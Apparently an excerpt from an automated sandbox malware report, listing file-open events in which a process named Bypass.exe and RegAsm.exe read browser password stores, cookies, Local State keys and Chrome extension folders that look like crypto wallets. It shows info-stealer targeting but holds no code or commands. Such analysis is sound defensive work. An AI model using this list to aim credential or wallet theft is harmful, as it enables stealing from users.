Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\ProgramData\SoftwareDistribution\Bypass.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
